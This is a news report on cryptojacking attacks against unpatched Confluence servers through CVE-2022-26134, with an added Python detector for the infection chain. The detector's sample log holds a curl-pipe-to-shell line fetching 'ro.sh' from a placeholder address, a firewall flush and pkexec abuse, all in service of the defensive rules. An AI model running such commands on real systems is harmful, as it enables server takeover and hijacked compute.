Hackers Targeting Unpatched Atlassian Confluence Servers to Deploy Crypto Miners


A now-patched critical security flaw affecting Atlassian Confluence Server that came to light a few months ago is being actively exploited for illicit cryptocurrency mining on unpatched installations.

“If left unremedied and successfully exploited, this vulnerability could be used for multiple and more malicious attacks, such as a complete domain takeover of the infrastructure and the deployment of information stealers, remote access trojans (RATs), and ransomware,” Trend Micro threat researcher Sunil Bharti said in a report.

The issue, tracked as CVE-2022-26134 (CVSS score: 9.8), was addressed by the Australian software company in June 2022.

In one of the infection chains observed by the cybersecurity company, the flaw was leveraged to download and run a shell script (“ro.sh”) on the victim’s machine, which, in turn, fetched a second shell script (“ap.sh”).

The malicious code is designed to update the PATH variable to include additional paths such as “/tmp”, download the cURL utility (if not already present) from a remote server, disable the iptables firewall, abuse the PwnKit flaw (CVE-2021-4034) to gain root privileges, and ultimately deploy the hezb crypto miner.

Like other cryptojacking attacks, the shell script also terminates competing coin miners and disables cloud service provider agents from Alibaba and Tencent before carrying out lateral movement via SSH.

The findings mirror similar exploitation attempts previously disclosed by Lacework, Microsoft, Sophos, and Akamai in June.

Lacework’s analysis further shows that the command-and-control (C2) server used to retrieve the cURL software as well as the hezb miner also distributed a Golang-based ELF binary named “kik” that enables the malware to kill processes of interest.
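The stages described above (the “ro.sh” and “ap.sh” script names, “/tmp” added to PATH, iptables disabled, PwnKit abuse through pkexec, the hezb and kik binaries, SSH lateral movement) can be correlated per host from process-execution telemetry. The following is an added example, not code from Trend Micro, Lacework or the original article; the log format, host names, addresses, the `confluence` service account name and the three-stage alert threshold are assumptions made for the illustration.

```python
import re
from collections import defaultdict

# Constructed process-execution log lines (format and values are made up for this example).
SAMPLE_LOG = """\
host=wiki01 user=confluence parent=java exe=/bin/sh cmd="sh -c curl -s http://203.0.113.10/ro.sh | sh"
host=wiki01 user=confluence parent=sh exe=/bin/sh cmd="export PATH=$PATH:/tmp:/var/tmp"
host=wiki01 user=confluence parent=sh exe=/usr/sbin/iptables cmd="iptables -F"
host=wiki01 user=confluence parent=sh exe=/usr/bin/pkexec cmd="pkexec"
host=wiki01 user=root parent=sh exe=/tmp/hezb cmd="/tmp/hezb"
host=wiki01 user=root parent=sh exe=/usr/bin/ssh cmd="ssh root@10.0.0.7"
host=db02 user=root parent=bash exe=/usr/sbin/iptables cmd="iptables -F"
host=wiki02 user=confluence parent=java exe=/usr/bin/java cmd="java -version"
"""

SERVICE_USERS = {"confluence"}  # assumption: account the Confluence JVM runs as

# One rule per stage of the chain reported in the article; each is a weak signal alone.
RULES = {
    "script_fetch": lambda e: re.search(r"(?:^|[\s/])(?:ro|ap)\.sh\b", e["cmd"]),
    "path_tmp": lambda e: re.search(r"PATH=\S*/tmp\b", e["cmd"]),
    "firewall_off": lambda e: re.search(
        r"iptables\s+(-F|--flush)|(stop|disable)\s+iptables|iptables\s+stop", e["cmd"]),
    # PwnKit (CVE-2021-4034) is a pkexec flaw; a service account has no reason to run it.
    "pkexec_by_service": lambda e: e["exe"].endswith("/pkexec") and e["user"] in SERVICE_USERS,
    "known_binary": lambda e: e["exe"].rsplit("/", 1)[-1] in {"hezb", "kik"},
    "ssh_outbound": lambda e: e["exe"].rsplit("/", 1)[-1] == "ssh",
}

def parse(line):
    """Split key=value pairs; quoted values may contain spaces and '='."""
    return {k: v.strip('"') for k, v in re.findall(r'(\w+)=("[^"]*"|\S+)', line)}

def detect(log, threshold=3):
    """Return {host: [stages]} for hosts showing at least `threshold` distinct stages."""
    stages = defaultdict(set)
    for line in log.splitlines():
        e = parse(line)
        if not {"host", "user", "exe", "cmd"} <= e.keys():
            continue  # skip malformed or unrelated lines
        for name, rule in RULES.items():
            if rule(e):
                stages[e["host"]].add(name)
    return {h: sorted(s) for h, s in stages.items() if len(s) >= threshold}

if __name__ == "__main__":
    for host, seen in detect(SAMPLE_LOG).items():
        print(f"ALERT {host}: {', '.join(seen)}")
```

Correlating on distinct stages keeps a lone administrative `iptables -F` (host `db02` in the sample) from alerting while the full chain on `wiki01` does.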

Users are advised to prioritize patching the flaw as it could be abused by threat actors for other nefarious purposes.

“Attackers could take advantage of injecting their own code for interpretation and gain access to the Confluence domain being targeted, as well as conduct attacks ranging from controlling the server for subsequent malicious activities to damaging the infrastructure itself,” Bharti said.

https://thehackernews.com/2022/09/hackers-targeting-unpatched-atlassian.html?
